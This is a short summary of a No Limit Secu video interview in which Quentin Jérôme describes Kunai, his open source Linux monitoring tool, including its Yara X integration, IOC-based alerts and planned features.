New Video from @NoLimitSecu: Discussing Kunai, an Open Source Linux Monitoring Tool
In this video, the No Limit Secu team welcomes Quentin Jérôme to discuss Kunai, an open source monitoring tool for Linux. Quentin, who has been working in Luxembourg for about a decade, has extensive experience in incident response and open source project development. He explains that Kunai was created to fill a gap in Linux monitoring systems, inspired by his positive experience with Sysmon on Windows. Quentin notes that Sysmon for Linux, developed by Microsoft, did not meet his expectations because it too closely mimicked Windows-specific events without considering Linux's unique characteristics. This led him to create Kunai, a tool better suited to Linux monitoring needs. The name "Kunai" refers to a small Japanese knife, symbolizing a versatile and effective tool. Kunai stands out with its JSON output format, which is easier to parse than the XML used by Sysmon. Quentin has also integrated Yara X, a Rust rewrite of the Yara tool, to enable file scanning based on dynamic events. Yara is a pattern-matching tool used to detect malware by creating custom signatures. Quentin explains that Kunai can generate alerts based on IOCs (Indicators of Compromise) and take actions such as stopping a process or scanning a file with Yara X. He clarifies that Kunai has its own rule engine for dynamic detection, separate from the Yara rules used for pattern matching in files. In terms of performance, Quentin acknowledges that the impact depends on how the rules are written and the number of rules loaded. He encourages users to test rule performance in a CI/CD process to avoid impacting system performance. Quentin mentions that Kunai is a static binary with no dependencies, compatible with Linux kernels from 5.4 to 6.12. He is currently working on integrating new events related to the IO_URING stack and adding new actions such as quarantining suspicious files or blocking network traffic. For the future, Quentin hopes to receive more feedback and contributions from users. He emphasizes the importance of feedback, even negative, to improve the project. He also invites those who want to learn Rust to contribute to Kunai. In conclusion, Kunai is a promising tool for Linux monitoring, offering advanced features and integration with Yara X for more effective threat detection. Quentin encourages users to test Kunai and share their feedback to continue improving the project.